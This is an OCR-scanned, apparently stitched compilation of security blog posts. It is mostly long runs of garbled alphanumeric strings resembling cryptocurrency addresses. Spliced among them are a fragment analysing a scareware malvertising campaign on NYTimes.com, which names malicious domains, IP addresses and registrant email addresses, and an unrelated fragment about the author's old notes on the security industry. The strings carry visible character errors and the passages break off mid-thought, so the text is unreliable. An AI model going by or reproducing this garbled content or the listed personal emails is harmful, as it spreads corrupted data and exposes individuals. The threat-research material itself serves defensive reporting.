LQAtKhHYmmMCZEMt8cKbyAftJMo7jD2d0oA5M 
LQAUfDCznxmaytrbaSneeFbBcS1ANLd9aV 
25766 


LQAVZZURMCxioxFKZMX8ZmMM4WKN3eji9Mw 
1QAz83RNebQj54fPYrHxE50zcPyVRVNHFb 
1QB26YFfyjj8x5CTX4Hpx13ZnWaQdti38y 
1QB89eZhsn5VGiI5vvX4VDfL8EMALhxvr9xV 
LQBA7bcPzXhKWr1zEWYYdFsCgiVqyY8RLij 
1QBAcgVjRW2VxLWcd5CqaQwEadhLdFc8Mt 
1QBC5ezVxAuA86WeUrpdPFUMLJxx7yj26c 
1LQBcHE532LENdAuXncqbXsubyPNZbj9ZVn 
1QBd5xLtos3CCd4A1laLSNmwge3j7MSmi8f 
1LQBEuTeVJW3xj8wsLSHFYGZ9NtMWzt7nE9 
LQBGqWogFRrFLvzxx3kojQYUczuEbUne6Xd 
lqbiVT6Fe6rWmv7GVf3CvaBPgsboxYKUn 
LOBNtfZ5nVobhdU6kFvv6XaL7Fq46CnwRf 
1QBo7qFMJNXdP9vgu87YoLiyoz5nSkt4jL 
1lqbPi3yK8DMzy6S5j6CCsPPVeDQ5jTe7V 
LQBuUAGIVsgUgqtv46bhjNrk64cBAUEVIMWN 
1QBVM 7ui5WfyQdAYK6aN46u2zzVXciAhDs 
1QBY2Ktgaq2waVZdWafb3mQj7yJ5)J8djuV 
1QBZtskK6ib1bTCGHrrqeopQbcFro618y5S 
1QC3VqsKNay46Mj9DD2g6UbwRg6V4cMu2T 
1QC5aNxkXcrVhLfjrcAk8J5essN8gwtnxW 
1QC85qLSBVbEr4UCpRRj6TRp5J225jKRss 
1QCd5evfuWGzocRJniJHpDDEcaJZczVUB6 
1LQCFLdQEpjZLaTyqyeZex5eC5JBAuy5d23 
1QCmFh95S9vcXmKFfH8slLc52an1WnDYPns4 
1QCSSjwSoEyVS4fNbVCcJLy6g4NfgeLTF5 
1QCttxVQLVJMGGRILFSRNxHfQeNWvH6zW 
1QCVLeRBrW2RWDYUrV2PAWVR4AB XuxaVj2 
1QCWvSJ27Xy3fWp5jroUgA21qgioeCSh3J5 
1Qd1C16uaVEht6UXqaTD73JeT5Sc3pR6a 
1QD1jGYx3V2Giy4CjKs7XZrx4LSYUmw184 
1LQDcWV9gGiyZNGioXXRMDPYGDbDLs1YDZSZE 
1QDgP6VhFaGr9CboWfR2eVeMkx88mx7zkq 
LQDHA6vqg6tr8MLY 1Hdf46WfSvHgPbZLBwu 
1LQDKCN6KQ2v7q18JW72tVB3zYANKfsjV1R 


25767 


1QDn81xfgW3vM9MMnFhH8xzePNmSVPfECt 
1QDp42WBzRYmaUubxUbS5 7LdtwP53RiXEi 
1QDr14LhLh5GkUYLSUXxEaAJ771UVMrT3E 
1QDSsu20Nhj8BcVXrgT XCXgYKHZ7kKH9qx9 
1LQDtpWFJYg8pNk3UnPXVbKE6U83SoJuB]} 
1QDupSbzNQ60iZmMPHUujBNmmxnxN3VLt9t 
1QDxmUjBxraYyGDyyUcxXC8sfp3HGsJkKGM1 
1QDxvdVZtBNfsleY18teayjnhSsj35WTjy 
LQE6KGjbMxcWwjAAB6TLxBTLM8pAnso7gT 
1LQEc8ZduvEx9AAZGHa6JCk9fCbVpdabeBY 
1QEei8pkieSRQVPeXffjZmL2pXLPeXrRMK 
1QEgA2uX1d1sxrWFuR7WQ207P9Y4M5Lvi2 
LQEhHETnNNBJeQbWi2HW37Xu4Nh3fMSVXn9R 
LQELGLEWPQnLPTUKSrjLFzXgywGcXBKP6s 
1QEPLgzqBWya8J3CBJQXeJ46MvmPpDw3Uu 
1QErqjJ1r41By2FfmzLZ68ZRHNgUHbYTMgq 
1QEuae5crSYKtzcp7MQHZchWdo8CXwemQM 
1LQEUQDmuytqjazdsgRzFmZg58jWshCvpBg 
LQEV6tBZNucZMmboMQ2XyAVkfgmmQuttgv 
LQEW5xLbPnZRBiqpUsMNEcEcq6sy12cKPy 
1QF27y2SsfAH5ek7sniYfukExsWwcE5izT 
1QF7sB8BhekbdQeMBnwJ1s2hjizLG31Grk 
1QFc850PCnmhTteVr68YMBazb1jWmGsywH 
LQFcCQhSFZqzrgfhV6DaWUwD78kBm6wz32 
1QFcydpFx8Sv43qsl12baTRNcDptYdLaRkx 
LQFFrrZ8T9TCj1VVCqHCkqBxXw 79U3chCL2 
LQOFFyAj6wfvBjWWVphLPNbGmikvSaDBLaz 
LQFGj1lwjkjnwiNp5PfeYjXvL8pbQEMgMjq 
1QFJeTvgxLCR5uJUNQ62UeQWsSgMmSGT2JVA 
1QFkrVgYHwiWexVnS1LAW2MDCARkrzmoE9Qi 
1QFo25EYXrjGK35STnYfHgsbUR5XLaEmQs 
1LOQfrukKANKtW9TeiSfFR8MHsJ8gYPJORV5L 
LQFxhnuGg9Ejkw40QxXrH8FvRqY4GCfnUdN 
1QG6EcroBiMdFX8MatBghRT 8w3MUrMoqmz 
1QGcEsSHC4GDEufssC99YZ36N57D2X8TLK4 
25768 


1QGcsems8YOoCKYiY7QFrcEsxsGjgtEj47Z 
1QGDi0Sj4buPSAjGKBynZ9LbD1RJziGjwz 
1LQGFrsmHCzw8Vf7GWgBjNXSYYQ3cqFdHLF 
1QGh6uNkuzjXeN5iguMQY64CY 7uvyBfgHR 
1LQGHZMaTbXHABCPHaVvkPNmvAAWZ]JX89FZ 
1QGPKwaLVJCdvf9E8ifCJDCeaBwBSjPmYi 
1QGpXhR6RYiIDt8Ezi2P/KPFIPK2J6tn5ka 
1QGr80rddAmpmNad7qreUNUFixR7bodRqp 
1QGRagfp4gZknfGwt3b2cGPv7TGyWW4306 
lagShpCjm4GqchAjpDuGDpQEBKgrE3uT2 
1QgTUQXFLETIVLVJC9OSh5A688ri2rT5hy 
1LQGWv2M6YrUFd4VaAfr5 7P2y8WcwgfE22e 
1QGXj75yYQNHH1BmTHWuAR3TmdXjQHAk1S 
1QGZrVTMrdBCyHmwhHeaxWi571SovWz4H2 
1QH4jFSsF8ANfMSBPAJ5ciCSBwKfehUFGA 
1QH5bedWCQnF4CawT1GU1le8c63qXWhCtvQ 
1QHdLJbUZEZnhhtGwRoMbKGGkKBAD3aSYMG 
LQHGRKLnNFHBMXFirqp3eTgk28cH4avDDKg 
LQHiyNWikqU7PELkKeeV4xB1QX408ChjdU 
1QhHKRZH5MWy6GoEVieVFcHxJ4vkdWGCh2 
LQHrHRj8aBHsHj1BsSivDd3ZqwYrppcjWj 
LQHV3L1dfKW3KDtm7iAs79RJZiFpWkC5wT 
LQHwWmNM2e8u8CJZMx65Np2 7UNxVNXRHAVkK 
LQHyQvUSHQjkZGyvEraVcmCrvSRYm9cyFE 
1QHzDXaDGJrjb9h2gMVuvi3nTc1zehSPT9 
1gihZH66bNccmmv7ThfqngJJ2ttMVPw92 
1QJAC57yTKTSHRqWbm9ED4knyPtQuyJKqT 
1QJAtV7 80qDwWqa7eQ8cPPExvdXW2cekKdh 
1QJCt}gBcvmp9pfwBqutwnnCRiM3EaGjLp 
1QJdHv7ykGGiZ1JfWeQyMq7QMEZ9RTItZq 
1QJg30so9NZCUsSN4u4L9thwGTXWMhs1lUYL 
1Q)GDFbFvKGTtemMK4ZLSmGEuoZxpfeJ9G 
1QJiuz8zHUkoxhrYZApqnqgApKdCtfpuK2 
1QJJQQ1CD5gPseqiDkuAjLcd6x2JzkC3xM 
1QJNrzBzcuBZDVWRZ3dUtpiMKjXBABBfxV 


25769 


1QJrFP6nQ7n8aYI8iueh2e7FYa5tJ/HcRBe 
1QJrFtMtp7ZDimM4GeTaNYUv67utgtTDm1 
1QJRGFwdRYDNKrzcQtp9uMQTc7z9ajmZay 
1QjV3kZto5sDu4xBMzJ86GNUgtgRkHeEM 
1QJviZoj2DAJX6aFQBL4SarTZDFxqNbPi9 
1Q)JxryHNTnTkHntkeZ6f92Svysiyh7gADR 
1QJYzdcJ3hQVR7JSA4HexDJNVYaPSWRRC1 
1QJZ3834v7eLGykEHuP5mzhnPfAnkGPKte 
1QJZ9EH9akRIMQAWn6MdJmpigNt4KEHToS 
1QK7WQomKX6KXR8BUpQXfA9G7qhUdQV2Uim 
1QK7wyxAqb4NexnExYvYgBSF33jM3Q8vAq 
1QKEKF3zXRfsFivTWfhx9BmMLQz18DUvTjt 
1QKge92puZX9kgRpcsDgMxkY4eHu6f6Z8A 
1QKGfeFBTAbDKR81MjmebvYU7xC4ncvL6Br 
1QKU4GgE4BDXTdno1GKocywLctipHYEHVN 
LQKWNGExyT]4yRQjs8eh9motYX4tFrSs8m 
1QKWz60xgdoFE2X07eKcvp6NpaVw3KFF9G 
1QkXGiMdo7NhzqSLu5pjcYxLWKzRgesSY 
1QKyuxvWwvBdxQvdH4uBRBc56Z2xTwwfT5 
1QKZM2Uhz8TZPMBMaAYMP2nbEyfzzk4NTW 
1QL2KhS6j VGFpqbgYHErHxkP4VMik7Pw3c 
1QL6maVfkm1louuDEtBoUG76ZtxNQfpBvzR 
1LQL7NPZMRYkYYQBTKtrikapUC6WfqREL6L 
1QLaciJGnTDUfLAMk2pdrwmPooTvHDmftd 
1QLDMxngJGyA3Db9Tn6HuF8kUrysQhddzv 
1QLGBeU4Au4VEtA6DJhD2SE92dFU6fCWoM 
LQLKGbkgEWpCixXEbqxvXgQJaa9DZzyYjnPi 
LQLM5zosykAuxH1FVS3i7xCBetgN6r1Mjr 
1QLQwtXaY8fcBpqv1ixj4iDqQpFuR9t2pX 
1QLU1GEof18Zejig904uN4jsmyk5MAnitD 
1QLU31KchEzAsjPNruEHGdThjwwyzWtabe 
1QpmvFaiEQinEdoH6yZ1UW2JedKpjKWyy 
1QQX1AnFa4sN61lyXGZmMVjx5jcQjLgNeD 
1qr4kP3cgbESLVzudmLPKRDNxziP4hlvw 


lqr4ypTDjg9CFGajGGaPhrnefu8ohfATc 
25770 


1QVqA1UTVF72HZLK3CJM9bjCd3bYWpsXxT 
LqW49VPZtTPrN3qyY93aitunKZRJm1GZDH 
LqWiecTHpgGdnk8NgZ7ZFjvGfyEqcj7E6 
1QXcY8NvjkGbyXdLg6LptT3SHadvYA2hX 
1qgXznRW9vK1lqrBwywoTvM2rmv9b6e76zT 
layfCWFyRqbSGo3DfVXhqiMT9aFCJ6QYy 
1QyygbsSKxTKUHE2mq3H74Y2a8TkZdFpE 
1R1lmSpjhEs3TJPDWzxDdDiwCy3mhGgbRA 
1r6C2m8WcwX4uvR303HxE5MZfHRwegpty 
LR9IgMbvM2FnRMG1U9HJT1ldupdkK32kdfyd 
LraoyEQ7HXhZGtw5vb38Xu3PsnpNnKWcV 
1LRap4FbTQCmh21jSyTQwrL1YjsuYU5UZz 
1RaZrMUgETuJwiAruua55xQxNvWZo8MAL 
1LraZYM1Pb56GT67sVm6nf6JHM8GDs1Jm6 
1RbGPKkmik7uaiJrQ7Lwr3C9ifL2ju8hy 
Ircvre47XmNkmYmWonfgi2op3bhnaGpAg 
1LRdCtifcxZ8yq7jCE9SHMkA8p90vV49Kg 
1IrdmSHhnrgqfrlLHSxGUDmF5WxdvDuHiwQM 
1RduoDPhancWUg9TdBekyPwqCja5Y4NFu 
1RekgbtYwFns361MqHnAAd6PVVacpVE7A 
LRFDv6VuUF Lix2d8g5nvqgnA6YiMg2wexq2 
LRftRhfFHArVKVPKHZpjB1rp56dexfYDyy 
IrMjtlL6kxhh4CwLWRCCAI5NiikDG2vi7X 
1Rmv2gPLLc9hHewwRWJsZu5CBZtKtgZYu 
LRn2AxR8YXAc1E5uh8WwwWTtgSu6kGsyql 
IrN9BAFmKRz1wkRHapXYu5beN1NwEsSjJL 
1IrndRdA7qk3bMPMXsabNVvZzhUmSmw/77q 
1Rp36CRZjkpVTk8qxL6tPLSMAbDhU34iR9 
1rQsiFdncikv1JuzkgqgAdvqKzfc35XNen 
1IrsFRVSSS8cDZYZsnWhJ9UQSHsGbtUCak 
LRSSHKX1j1kXjRtn8pNCVmGCZY7vP290z 
1Irtps9G8VBsjEscoRmiPi6FVgaSPDjoyK 
1rTRUCNcox3QpZF3XECU7ehmEAkT pafgW 
1rU6Fc1Fal7i2LWLd7Ug4iTBqZ3UcHBcT 
LrUofjYNnzLyPjYwarettScf5AYfCJNHS 
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1Rv39e1WZKBFJKVNJe529RLUOVYDp1ETk 
1Irv6SQZdDQjRb1L5iL4XsvhgYSfnFmTHok 
IrvHHxCKJ VXQDfUSkhQT2ZFSPX4HZXhPN 
LRWhzKi4ToLnFgc8P2LmM4mru2QsSrX1v7 
1RX6qdvEYGy4YZ6YAEoYJyY3CZsvm358E 
1rxPzJJhDGft3iuYQB63FWwYQnUcUOoR7i 
LrY¥1nLMycCinHAF3MymPaDajry5zhCtiY 
LrYWA7yJyEM5FtqGLHeGrANqRGoGkmNF7 
1IrzW3cvSL7EQgEZpckeb33dLzlgaeukZt 
1s45vUK7NzJPVDtfqFYy9CDpmdBs4BAv2 
1s4YyDtpz9D31dS]VAWFZNgfbxG26W54v 
1S8kdZxDN6No8XA65myynEYEkJQaminP8 
1SAFJ57Y4ht6qUyvRGGDUbSVKJBZDitpn 
lsawGBP6ByVsq Tua8imu5fkdbcFRYSUKB 
1lsbtR16iSe2zd5g8QbB7YFjy45eajZ1Eq 
1SHKuWnDCgh4dahpzvxfDZSPGxQYcHCjH 
1SjGbzU60j LmMEbb4rmCC5E3dBmeWkKgcJE 
1sL32GP3QPs75h2B6aRgPTW712v3wuB7v 
1SLi8UQowzp305RHdi6TWjxVHEIUXyKKu 
1SLp4ojdLre3GLpWgr6DhtXHrkqV8tbxf 
1SmepFBjp4tDHZbEMSxU1ASLxr4JGBK8z 
IsmpjfFgdGYtArsk7RNRHprYSywRSvsmp 
1LsPRfYWjgZ37mJ9RX87aKdoMcmBJUuJJa 
1SqAaawugfGjdN3BVVqTUAGntDP]geY5W 
1SqbbD3SDfHBA1ZhG2MF6xJGUyHBWAh2m 
1SQq4mF5hwjJgLEwSR85aao50hLWhBaX7 
1lsQrvnms2z9XnrVBdwxPvRgs4tLrDo2kB 
1StengtldRHjDzZzhwoDMXSzdsGUvpM3o]1j 
1sVZfGFwC7CSFWHKKgL6L32d6Ci9iIYvyK 
1SXR2ySM2pQZuG28ikGyQTq8D6srNCWUZ 
1lsYeU3VNYTgoxFX5zVciK4w6ErLqx7N4S 
1SyyRCkuwAYs6tvm26ZUWBJDWY4xP2nDf 
1T4MtKZosBn9eRIKQ5StET8J9jPbtFLKkD 
1t5bfU8)9AFMactm8huKVZ16NEwRujxiC 
1t7HSq2ecRDrxjDe8B25yTMekT24yhS2T 
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If my [1]Ukrainian "fan club" can [2]exploit weaknesses in the online [3]ad publishing model 
for scareware [4]serving purposes, anyone else could. 


Yesterday, the NYTimes.com posted a [5]note to readers, confirming that a malvertise- 
ment campaign somehow made on their web site, resulting in the automatic exposure of users 
to scareware: 


"Some nytimes.com readers have reported seeing a pop-up box warning them about a 
virus and directing them to a site that claims to offer antivirus software. We believe this was 
generated by an unauthorized advertisement and are working to prevent the problem from 
recurring. If you see such a warning, we suggest that you not click on it. Instead, quit and 
restart your Web browser." 


1 
A 


/ / vi, 


A 


/ 
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1t88ZsdG5kQ5pviUKrgNzZv56MZ2aZfizi 
1t9djdKhoCD98WCgJs5kbJFxTHQNNrrgKk 
1tB6ZqHV2Y93kvNihi67Un6aamEeTiDvW 
1tbdgkDv16P4NzqeaYsi76K2rM4eb2iSf 
1Tbu4LUbccB6ezrqUePAQUeiIk6z1pa6b5 
1te9ZG5k29BRObWBoQ1kMTzj1BU39diAYn 
1tfUxUevwRD7kKGNAmZVBCopPN3Szdyezb 
1tGHxuPCRiod1dEfXs4FXY7Tfm6RsSBY9c 
1Tgvaxs6d3jPFVZ6dALPAtNDLZwnfM4iV 
1tH1zZ1KXiz2cumwjXkWJLiZrByypZEbmE 
1th9mPTYumfdAzCevEV1dwhG8stVnRB5n 
1tisw4E06C97P2MPeDiEZE6bkKM8wbpCys 
1Tknq3k3Wfe2TuZPp8cPDpiQysw7ic7RM 
1TKX9r5u21mjiHju5d1FV4AhAK5FTBLa5 
1tLLbYEQsQB4WWZUd8xdN3Gye2rPTCF2S 
1tP8PaTZUCyCfVahS71jV58ubtNn7zfhH 
1tQed8iela7b1FbKahwkeoKn]XP288YUd 
1tqEfUp3hiqRnM4jDkKNWD3xvdoZv3sMVn 
1tqzzzwoUgc7iL6P9ACA9tBYS5EbDvfDk 
1TrCS8a6ycktMVMXruwtEosbwECaP3Svi 
1tTAA7PsTZ8M3SEYkqZ6mtdeVGc4FMUnz 
1tTnnuf8gsm8z5QmSZ6BbbUMm8Byw9FcVMmT 
1TtWehh3nfJzoG955LpijJJ 7inr3Kdcmwz 
1TVGXNJSk7rRZf7p1lbb7hHs2ZDiIJLIHLG 
1TxHcgbt1irzYaFndukWo4tgFAMyjZqNiC 
1TxMoM33LzsxoME3TzJDsfYy4gNDQjQ3S 
1ltykKN1vSrZ6qUAn5RDheqnNHJBANXLZMC 
1TyxTACCU68USYRdKaYWzerkKugbmtvYZk 
1TZWHe4pfuMhctmnRp9sVqvDszq73onnu 
1lu28JbVEPw3UWbfak9VW9ZmMZYiVjac3Ak 
1lu3a4GQt3ne2VmjcKY9wuvkjQZ6VB1XFA 
1Ua4EMSEr4eCsSXFTd2nzT7n32Yxf3ZwD 
LuaCmab9tkPEHPoWu2V6PbbvSm2AK65BE 
LUANC2HUUHcCW6KfXt8HFWW9Z1YfBk8iNZ 
lub4gfxSJeaq3he3psUjJ6RECQIWYNJaaJ 
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LubQCBVCRCQHo1xAHrAVn1RSyZz46tBQs 
1LuBSS8ExymQRahfyUqAVuxF7b43Xqd1B4 
LUbZ1m8vuWodJjHkmzk7GugrFodTTAVZ5 
1Uc5YAardxvMtDaR453W3deQnPTEE2bGG 
LUCJ8wot2HqfEEBebANG36FTVMpwAE44r 
LucP1D3b5L3akxqo4bA2keiJakyWD33fs 
LUd5ph6AthpLfABUMI1vttNyAFJg3gNYXq 
LUE8UK58khVCZGvMU1ZqrHEdrLYvLGkYv 
1uEoun5VT2rbUbWGocg8gPcVQtHxpQQMr 
luetx2bAthivqTfRri7L2hwgC8ww9qLvj 
LUFtF7aAv6pTVVN14pVmo7wj8gSsL2ruU1 
LufvZbEKLUosqRC2XA4xZHHdfReHkraPL 
1LUi4P3SaGVErVmFEHsqr9Hgmap IcGTMSx 
luJ9pLeyzJF9vPRgwcbVKbzZHKYJZzGBf3R 
Luja95isAxe8vtRPkz4hNqs79A9XjocDM 
LUK2QWCYg3JohjFbimxPrLoEhrphiBvJ1 
LuLKvpFaXnAEcvWxWqZPRoM6urYyd7qYW 
LULyABgVwuzVAh2ZjcTpZZxBLLHQ8Uxt2 
LuoAagv4Njq7KJd4H8dhgs7diRD4cZxsP 
1LuoSH48FhHBfj37fiwzfoCZcENBGtCSkv 
LupRrpCXh3EdmGPoRbf4QvoFnBPAYKhYL 
LuPwFwqyYBPctdgXyL4ySJja4bFqDqGHFRx 
1Urxb6vemsLoGUVq7p3bGfhT3TTt]7kuM 
LuuFEp5vLJyJYRZAtDWK2ts54h4wRspA7 
LuUngiMk8evrV5tZ8D7qVaWbGLBjdSVP3 
1LUuZvMo9crLHCiB7d7QnEPZcHL638NyDL 
lv1lhLeFZczCBQeuDRyKwjxXrs5pKWqp6kB 
1V2YKRSGaerJ2AKNjsGn1jo2gdiMJXDEZ 
1lv3i3RgkstMhLa6KAfQKrmNZBk8d2g37z 
1VacjkD4s32WopN8k9CzTZHesTfNLeBp8 
lvaNWpanmXLQB37Ys2mE7sGG5Mvv1lyH1f 
1Vb99wMwagpLPgc5S4i32d4a9RqSjgCmFw 
1VDJaznt4FVJhp6Ef426dApgbTUbLEjr5 
1Ve1lLZztTG5aycGdtJJjjju9xmtBNcJw5 
lve5dtRidpW9wMoyWhXbatN9CGJ621NHn 
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1VEx73XvMngkKfQRZkKNrkDkuMhv5xXuTx 
1lvFidoWeLZ2AGFMNKkFkHvaYjpYul7m2g 
1VGEm4TCq4SACZrWWzcpqTFrpn9nxrFNc 
lvGtDVQfywzHm2o0QhcmzdDxgznYuGWH6t 
lvgVYqSiQpPd8Q90FwqF6qxXEBM1rKwUh 
1vJXJnQ69bcsD27ZJUj3eTpns2N6fnWUR 
lvjZyWurGeewjctgC5wjNt2vSKmavVtk5h 
lvk1sAXUXRfS]mtHbAbDMxCNLKuv6qB6oR 
LVNMSd9VQPcCA3]7CxMur6tiiWggoq3tq 
lvq9yPu9nTXJVBTkhyDGSSizuL5MddVck 
1VqmfXSFykvJFLUkxr7aYQPifQWYhrvfz 
lvrCMrFuuHpip885sPYbTVZJzgdVJY2Yg 
1VrMs41PQ3M4o0yeND358PA3i7PQPH8u4W 
1VTbtuSLmxjeZLPTPEh9X5kCNrjMJGSe2 
1VxNqNJ5DEHZuhWjyNxZEtSKCv1lsPkp4M 
Llw4wjCSmU5ZSKLI4xV5xhNbCfUYeB6hPN 
lw6eC22GXL1PKjfToDiIQL6wnqdJjVMKWH 
1lw72NiYBTj3GBufMErhwQtVsFeVCz5X7B 
1W7dHCksw9hwPQDPuqqxwsjRHanCx2ao] 
LW7VETgeGkNobCygquaqm2uPLjjn6Z4gn 
LWaBYn4ATKNk4ygEvgRHNZqAxDMiXR8AR 
LWayjeCRAWvta3M9gLu7ojSFR7yoied8p 
LwChU8sLeYjexCx5Q3Mk9PevGixYjazvm 
1WcrmM6iAHyoZWriGoMW2AZtFDSL8gYAU 
lweKbZj3ahQlcmZq3m3sWs302NTTI8kdug 
LWGdBrZk8tx90mMGUpALSDGDBxXjiNST70X 
lwGjkmyEg92affbco41DWNF3SifLveBJZ 
LlwGVdQpeVaselaPbt]16MLxRnhHG5bUG9 
LwhpDM4fEtodVQWZrswR4FA60M 3wrwbFT 
lwkz6pZagb8DugEn79LAy5gYZecrdAhLXx 
LWLNHTKMJ1bFkLbz2J3817m5iGtZEhjXF 
1Wm93hKmtvYLsCX8duMNruazZWDXBRCLA 
1WM9k6cNgdrX2BFoX36uuJ13gcwdsSMPN 
LWPi9tmuj2ZKH4LDojgYMh2bGNMG5Hvcq 
LwpJWhh2jo2BFqJNxhqxCxv8pTXxv4FCi 
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LwQfCjfwRfmNrilLEBLNCiPqmtk641A7ki 
LwqZERtQzBiZFga6b4BAeRWjWhupdSaw2 
1WSM7A9tCMZRWnwSVDX8qcEa3YWgTYT Vv 
LWUN427Zhw5soby8zVqsRPzXpsbHrECU5 
LWUNBxuxCyW4AfcvescMHGrnxZN6Qs6TZ 
LWURDidtbejTS3f1PrqPFvS7o0U5T2fNke 
LwvDNpuDdyixA8GyEKPASYJ9S4AcCGK6h 
LWWPwBRyUxs9qCKmflQWQU1wsZbk8bG]g 
LWXKJw2yaxdRwZutbqhzU6ho8pwB5hhfG 
LlwyX6LJ4W5hUfbsF90v4wQ3s7sAX47nvH 
lwyXMCh1irpU8DSX14y7iLC2bDLogZoii 
1x1KSaH988HjL31riKk9RybfEaJfL8ntv 
1x2sYaJYpJfDLd8F BSjeaVqMCZjRewaBz 
1X5Cx8JJDtoGBMCVDx3CzvsAz5jrjJeYuz 
1X66fSZUsLidBtWyseez3sjESb2949ThM 
1x6F3FnozYBhmsXu67DAQ6HEx8XomLap3 
1X8gjXKz17veMey2CKzwoK6F1lmuKMdbZz 
LxAyzyxhqrVfcP5TZxAXhV3tHF8T 7kg63 
1XbQp7EYk5i1ZpvkgwmZdnielkZPuYiP6 
1xCaxXP7oyapahDj 7vwAJxozeMtT2tP4Z 
1LxFvZ3jzWeJCwm4CTz524rLHD5BAM9bSS 
1XGBBdB9PwjJbUFambTiocrCV6fZAMUKKN 
1XhR1zrriL5gQd5KmcxLjNmMCR3nGobFPs 
1xHu9ab3CREh9cLvm4LkQDh669ySTjkAu 
1XJVUzx5z3VE8SmBisPEtgPCcsfHSgt3d 
1Xm7fQ8YbkiJvVojp4uZUVZrxeYGxgxGZ 
1XndyUocE1YjC1RCXLiLDOoDBwGWTw15dP 
1XNuRTtubPkF2AhuvYC9sV1dW5jkGbicV 
1lxogTBoyk44ubNiIMM2edCoCeN8E4ixwcB 
1XPLO6OPJsF87mkhuLhWpgmzK5jTR1juExj 
1XrEyN6ERbeCkyKUMoLHnNmeLqzfTESxb 
1xRMJSNRBKwCLNQBn4kWjUNfCfHQ4BnEy 
1xtCSx53VP69VUAUXMfFhY63GFbZ9JSkj 
1xX8VpqdnS9kDNyj4SSvmHiKidojJw3jJK 
1Xyy4ruBcaTN259xqhXeDBJRGUa9paébhp 
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1Xz32PthKZj5iceamakb5ckU6sDUXuiKQ 
ly576fsZuXQ7BxnCTs3C1LLKAURdVCQaFg 
1Y7XLJvS8XFiIZPrQLH8f5DIONb3tdenEgj 
1LYAFLCqUvjD4QqAHHTZo56ebsaSji744C 
LlycP2yNWCRPPtTUc4x1K9NphupWyWygY8 
lydKPcW3WUABuwbgieE8pLbP5ZygUpaqps 
1Yh5PCshBx4sbjufNeEucRflaxtDcL7to 
lyitW4wEpRGWqSiRHTexh7McxZ2Q4G3Si 
1YL6Z5BQCUY9UZ1jvjc3KV1VwcefZciWc 
1LYMsTtmiT4fNdhUDOoRPhA2wsjkStnbBsE 
1YN6tbQXtabmaqgEYI5W8jUSGkKHDGacgtEH 
lyqlPNgfpuKQwpkbzkeLtBSvtu7dUT5eF 
1LYRpKHGQy9jCGN8NuYisgKhfBvv4gx6xz 
lysQLev4icyqQZY8NDyok4nuhzaERsmoG 
lyt2riAjzgspudNCqREcTg7DZzhv7p7g8 
lyure2RmaQEZB8wT1rT 7tLtC9SxK8cQG4 
lyve4DUneZFraYQvUzw7rcUs3fTDrDk7X 
1LYVPNuRf8dGikAYVfNyuuLQwrfNRBvoPY 
lyXAhdoM1RcejphYsvbecnVJBVqwhm1ex 
lyxmRqqFPeccTh4upxTjauvsxGZiVBhVu 
lyYQpnz3XdvKGdfPXbzsR48vEKJLGPjoL 
lyz5VY2XUsSBAsSvgFjNgAsN3ZUv3jRZLv6 
lyZkWRa7pWdVGkQYJcUhwtX9VuMcekhra 
1Z8CnATEHf88yo5UBDVX lasCwicMHWioG 
1Z9T6EMMUAD4FWphtJggnsELoCLGLgDxP7 
1ZceALc8ZyZ)XajohPf8MG5arkzj75jyw 
1ZeekMuuqzDD3KNXelTg5pRugKEHsydWh 
1ZFqFSptLQUG3WWPDMTBwWA7/7vLv8J7Cq4 
1zGega4dazjaKd3YKwBpvjsqB19bG9wbC 
1ZJbgF85LShH6j/EUWEb60xpFFX4SmgRzZJ 
1ZJY2eRmoacfQLCSYEGWmSuXHKHYb2vf8 
1ZKUhBvBg5QHYYH23wQ/7oPHJ2PcNrhPSo 
1zLb2XtUN9GRMpfNej2nLXqPKiuou31my 
1ZnTSgqUZHHHVLAAGwg3vvU22H5LCXUEC 
1zoM4zggwrTHpLgjkPnFK1Q8iWTP]jrTk 
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1zqA5UzcHhQ6S82hF5Moaum3KgtP9yAxm 
1ZrpyPbPUTt9ORRVIW1yr46wWocipzZ4Nn 
1ZRWVZCC5rP2MRcemsbsGRMMmhpPhT/7qge 
1zSQnhtzWaQggamJaDQ75Fj7hC29x7uae 
1ZtcKoZPKTM1G9d56n6biakvrm44ixKwY 
1zVaKuPkDDTYte8884qZ9aDcW4TZaQxWz 
1ZvX2E5bhH4GWXQXJkxmyD5WiFECbndac 
1zwK4r1KP5xtTY4qwLCFwq2QybW53ek7e 
1ZYM55sSXHgjnL7ZNFo1YCd47UFLWpijfp 
1ZZJDU36vDWiQB4YvtJR1pym7)|5AwdqZi 
Stay tuned! 


1. https: //blogger. googleusercontent. com/img/b/R29vVZ2x1/AVvXsEgc62MbU50rp6UHgTOf yt9EcZ8qc61In7AqugCg9qTfdDrx6 
NVXWSf£kOWaCKeGc9OHMAKZ2yo0idHT4kENu-is5-aanf46ar-oWCkU80 


18.10.11 How to Build an Information Security Industry "At Home" - The Definite 
Manual - An Analysis (2022-10-26 08:28) 


[1] 
Dear blog readers, 


I’ve decided to make sure of my notes on the information security industry publicly accessible 
which | produced while | was studying in the Netherlands circa 2003-2006 with the idea to 
share my knowledge and expertise in the field and with the idea to motivate a lot of folks who 
remember my work back then which you can check out [2]here. 


Sample screenshots of my notes while I was studying in the Netherlands circa 2003-2006 on 
the information security industry with the idea to dominate it: 
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[3] 


[4] 
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[8] 
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[10] 
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Who’s behind this malvertising campaign? Let the data speak for itself. 


According to [6]a published assessment of the campaign, the redirector and scareware 
domains involved in the malvertising incident are also in circulating in [7]blackhat SEO 
Campaigns courtesy of the Ukrainian gang (the post is updated daily with the very latest 
redirector and scareware domains pushed by the gang). 


In the NYTimes.com malvertising attacks, that’s sex-and-the-city .cn (parked at 
[8]94.102.48.29 where the rest of their redirectors are) acting as redirector leading to 
the protection-checkO7 .com scareware, parked on the very same IPs ([9]91.212.107.5; 
94.102.51.26; 88.198.107.25) like the rest of the new [10]scareware domains systematically 
updated once or twice during a 24 hours period, again courtesy of the "fan club". 


The [11]last sample in circulation, phones back to windowsprotection-suite .net - 
Email: gertrudeedickens@text2re.com; mysecurityguru .cn - 64.86.16.170 - Email: an- 
drew.fbecket@gmail.com also maintains secure-pro .cn; and to securemysystem .net - Email: 
gertrudeedickens@text2re.com 


harlingens.com 


kennedales.com 


newadsresults.com 212.117.160.0/19 ————“S-g» s44042 


relunas.com ip-212-117-166-69.serverlu 


tradenton.com 


waveadvert.com 


The [12]NYTimes.com malvertisement assessment also highlights tradenton .com - 
212.117.166.69 - Email: shawn@tradenton.com as the domain used in the ad rotation. 
Interestingly, related malvertisement domains managed by the same gang, have already 
been reported in [13]related malvertising attacks, are also parked on the same IP: 

relunas .com - Email: admin@relunas.com 

kennedales .com - Email: admin@kennedales.com 

harlingens .com - Email: admin@harlingens.com 

newadsresults .com - Email: ritaj}@gmail.com 

